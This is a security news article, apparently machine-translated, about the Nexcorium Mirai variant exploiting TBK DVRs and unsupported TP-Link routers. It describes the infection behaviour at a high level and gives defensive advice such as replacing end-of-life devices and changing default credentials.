The threat of unsupported IoT devices returns with Nexcorium and Mirai

In recent months we have seen malicious actors reuse domestic and small business devices to build booster networks with the capacity to launch massive attacks. According to security firms such as Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, TBK digital video recorders (DVR) and TP-Link Wi-Fi routers that have already reached the end of their support to deploy Mirai variants and related tools are being exploited.

In the case of TBK DVR devices, analysts identified the exploitation of the vulnerability referred to as CVE-2024-3721. The attackers use this failure to run a small download script that, according to the Linux architecture of the committed team, installs a variant of Mirai named by the researchers as "Nexcorium." The process is simple but effective: the infection chain detects the architecture, lowers the appropriate binary and starts it; shortly after the infected device shows a control message - "nexuscorp has taken control" - that confirms the persistence of the actor on the team.

Nexcorium is not a toy: it shares typical components of modern IoT botnet families, the technicians explain. Its features include initialization of a XOR-encoded configuration table, a watch dog module to ensure that malware is still alive, and several DDoS-oriented modules. It also incorporates known exploits - for example, it tries to take advantage of CVE-2017-17215 to compromise Huawei HG532 routers that may be on the same network - and has a list of integrated credentials that it uses in brute force attacks against open Telnet services.

If a Telnet attempt is successful, Nexcorium tries to get a shell, implement persistence mechanisms by crontab or a system service and connect to a command and control server to receive attack instructions (UDP, TCP or even SMTP). To make the forensic analysis difficult, once you manage to leave a persistent mechanism, delete the original binary from the equipment.

The technical description and commitment indicators for this campaign can be found in the researchers' analyses; Fortinet documents these behaviors in its research space and Palo Alto Networks offers additional context on the automated operation activity it observes on the network. For those who want to deepen, the portals of manufacturers and response groups publish reports that help to understand the evolution of these threats: Fortinet publishes technical research on threats on his blog FortiGuard Labs and Unit 42 of Palo Alto Networks maintains entries on malware analysis and IoT campaigns in your blog.

In parallel, Unit 42 detected active scans aimed at a vulnerability of the TP-Link routers listed as CVE-2023-33538. These devices are already outside the support cycle, and although the attempts observed by the researchers were poorly built and did not run code, the underlying defect is real; therefore CISA included the entry into its catalogue of vulnerabilities exploited in nature. The list of affected models includes specific versions of TL-WR940N, TL-WR740N and TL-WR841N, which are still common in domestic networks and small offices and therefore an easy target for automated campaigns.

The problem is not only the existence of failures, but the combination with default credentials and equipment that no longer receive patches.. When a router stops updating and follows with factory passwords, a vulnerability that would require authentication can become a critical entry door in the hands of determined attackers. Unit 42 further warns that the samples they have tracked include the ability to update themselves and to present themselves as web servers that spread the infection to devices that connect to them.

For those who manage domestic networks or small infrastructure, practical recommendations are not new but crucial: replacing unsupported equipment with updated models, changing the default credentials, disabling unnecessary services such as Telnet and segmenting the network to isolate cameras, recorders and other IoT from other devices. CISA maintains a public catalogue with real-world vulnerabilities and recommendations that it is useful to review, available in your site. It is also appropriate to consult the descriptions of vulnerabilities in the national repository to know the technical impact, for example the NVD entries for CVE-2017-17215 and CVE-2023-33538 in NVD CVE-2017-17215 and NVD CVE-2023-33538.

The reappearance of Mirai and its derivatives is not a surprise: these families are still preferred by botnet operators for their simplicity, low cost and the large number of devices exposed with default settings. Recent third-party research, including reports on "loader-as-a-service" services that distribute loads such as Mirai, also shows that there is a well-developed criminal ecosystem that facilitates these infections to groups with different skill levels. To understand these models of abuse, reports from companies like CloudSEK offer context on how these tools are monetized and distributed; their blog is a good introductory reading on CloudSEK Research.

The lesson is clear: the safety of the network begins with the weakest perimeter - often a router or a camera without patching - and goes through basic but effective measures. Keeping the firmware up-to-date when possible, replacing EoL equipment, removing default accounts and passwords and monitoring unusual connections are steps that dramatically reduce the risk of ending up as part of a botnet that, in the end, can affect both privacy and the availability of Internet services.